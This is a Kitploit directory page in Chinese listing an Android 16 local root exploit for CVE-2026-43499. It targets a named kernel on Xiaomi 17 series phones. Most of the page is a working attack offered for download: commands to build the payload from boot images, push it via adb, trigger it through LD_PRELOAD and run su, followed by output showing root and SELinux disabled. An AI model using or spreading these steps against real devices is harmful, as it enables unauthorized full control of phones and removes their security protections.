Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-43499-popsicle — CVE-2026-43499 在 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k 上的实现 | Kitploit
工具/GitHubGitHub/x-spy/cve-2026-43499-popsicle
Android安全权限提升漏洞分析漏洞利用移动安全二进制利用
GitHubx-spy/cve-2026-43499-popsicle

CVE-2026-43499-popsicle

CVE-2026-43499 在 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k 上的实现

查看仓库
2198181个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-43499 for popsicle

该仓库包含 CVE-2026-43499 在 Xiaomi 17 Pro Max(popsicle)上的 Android 16 本地提权实现。已验证内核:

root@kitploit:~
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

使用该内核的小米17、Pro以及Ultra系列已验证全部可用。

生成 target

依赖 Python 3 和 llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  -o source/src/target.h

编译

root@kitploit:~
make -C source clean preload

NDK 无法自动发现时:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

最终产物:

root@kitploit:~
source/build/bin/preload.so

运行

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

成功时可见:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0

利用完成后能够点亮、解锁并进入桌面,但新启动的 Android App 无法完成 Framework 初始化造成闪退;重启后 App 启动恢复正常。

下载工具